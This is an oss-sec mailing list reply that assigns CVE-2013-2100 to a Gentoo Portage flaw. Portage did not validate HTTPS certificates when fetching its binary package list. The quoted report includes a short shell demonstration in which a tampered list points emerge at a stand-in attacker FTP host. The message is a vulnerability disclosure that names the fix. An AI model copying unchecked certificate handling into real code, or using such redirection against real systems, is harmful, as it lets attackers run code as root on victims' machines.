oss-sec mailing list archives
Re: CVE Request: Man in the middle on Gentoo Portage binary package installer
From: Kurt Seifried <kseifried () redhat com>
Date: Wed, 15 May 2013 19:45:39 -0600
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 05/15/2013 04:46 AM, Jason A. Donenfeld wrote:
Hi Kurt, Portage is the package manager of Gentoo Linux. It supports many features, one of which is the ability to synchronize against a remote list of binary packages, and use that list to determine where to fetch such binary packages. One of the fields in this list of packages is URI: victim # curl -s -k https://portage-build.zx2c4.com/Packages | grep URI: URI: ftp://horrible.attacker.somewhere.on.the.internet/blah victim # emerge -1 portage-utils Calculating dependencies... done!Emerging binary (1 of 1) app-portage/portage-utils-0.30 from gentoo--2013-05-15 12:33:32-- ftp://horrible.attacker.somewhere.on.the.internet/blah/app-portage/portage-utils-0.30.tbz2
=> ‘/usr/portage/packages/app-portage/portage-utils-0.30.tbz2’
Resolving horrible.attacker.somewhere.on.the.internet... Over insecure connections, Portage provides the ability to use HTTPS (in addition to SFTP and SSH), so that this remote list of binary packages is not tampered with. This list of binary packages will be downloaded in the background silently. Unfortunately, Portage does not validate the SSL certificates, leaving this open to a trivial man in the middle attack. An attacker could leverage this man in the middle vector to remotely gain complete control over a victim's machine, since Portage runs with essentially full permissions. I reported this to the maintainer of Portage in Gentoo Bug #469888 [1], and it was fixed in commit b5969af9f5 [2]. Do note that while this commit solves the immediate problem with fetching /Packages, as detailed above, there may be other additional unconfirmed insecure uses of the vulnerable urlopen() function that have not yet been analyzed or fixed. Thanks, Jason [1] https://bugs.gentoo.org/show_bug.cgi?id=469888 [2] http://git.overlays.gentoo.org/gitweb/?p=proj/portage.git;a=commit;h=b5969af9f575e4e4b669f44e76ad01f0dbc2dd27
Yeah SSL with no certificate checks is not so good. Please use CVE-2013-2100 for this issue. - -- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux) iQIcBAEBAgAGBQJRlDpCAAoJEBYNRVNeJnmTZIMQANMmQfww+/2TTShIa3AcO9sS S6KnC2w40Q8eRza+8rMMWQ0w91e+vhQuQ09Zyl02xWctSE6WvlM/jtZTHKwjY4lh q2pxkSdMecTbNANtfkaIlU5rsWiROuGbvb33ITwjJNvONVGPh9+kx/xccRqodHc2 hlb9jhdKlZSVEUgIeCCBDTWGZnwbQF3CK9tFMWJGj6lTdOaqCiM04whfHmX9urje 6Fj0vLW1VbbGmFQZbIJajGzwNZQvwlNN9/5kn5nWE6WzfqXwxmj1NpuVlnFSpU83 0jeWEdbA0b7mKkDiBryuo5eRtJmdAHxpe+Mvqin/d+pXRLX7qbvpY2IlXTQR2U/u jtmO943UR+nRHdItAX0VPG6ua4AEecnqgUTYymMrt4344u8I3RoLwjxDGmmZyThV 0i84orR8rbdawQOUWUIjkrK9n/fPHDJ3QBdegZ5Na3nyGGdXSiApFzaxcfKmpVDe 4SzcNVghPQNj5mEappBTIPO5KdPF6FIQxWcj9/a6M9bVwJEyd4gZVTgQmGLAwHgQ jKdmWzh/hBwm+RTfgJMZI0nJmydUCFlGgd5PAFkMY7VY1lvbbaEEYQPdDE1mtHL1 60cB38PYBL5Thf25FqV+7cpjZTglOyDJsylPgHG3B6M5SDJXmKxgvnaJAW3+zpmQ y/dM0r9LeQu5MhPhsdeC =JhKw -----END PGP SIGNATURE-----
Current thread:
- CVE Request: Man in the middle on Gentoo Portage binary package installer Jason A. Donenfeld (May 15)
- Re: CVE Request: Man in the middle on Gentoo Portage binary package installer Kurt Seifried (May 15)
- Re: CVE Request: Man in the middle on Gentoo Portage binary package installer Pavel Labushev (May 20)